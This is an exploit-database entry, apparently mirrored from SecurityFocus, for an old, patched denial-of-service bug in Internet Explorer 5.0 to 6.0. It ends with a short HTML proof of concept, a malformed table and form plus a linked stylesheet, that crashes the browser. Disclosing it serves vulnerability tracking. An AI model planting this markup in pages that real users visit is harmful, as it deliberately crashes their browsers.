header-logo
Suggest Exploit
vendor:
Internet Explorer
by:
SecurityFocus
7.5
CVSS
HIGH
Denial of Service
400
CWE
Product Name: Internet Explorer
Affected Version From: Internet Explorer 5.0
Affected Version To: Internet Explorer 6.0
Patch Exists: YES
Related CWE: N/A
CPE: a:microsoft:internet_explorer
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows
2002

Internet Explorer Denial of Service Vulnerability

A vulnerability identified in Internet Explorer may allow an attacker to cause the application to crash when the browser attempts to process an HTML page containing a table and loads a css style sheet from a file.

Mitigation:

Users should avoid visiting untrusted websites and should not open untrusted HTML documents.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/10382/info

A vulnerability identified in Internet Explorer may allow an attacker to cause the application to crash. The issue presents itself when the browser attempts to process an HTML page containing a table and loads a css style sheet from a file.

This issue could be exploited by a remote attacker to cause a denial of service condition in the browser. 

<table>
<td>
<form class="quick">
<td>
</form>
</table>
<link rel="stylesheet" href="link.css">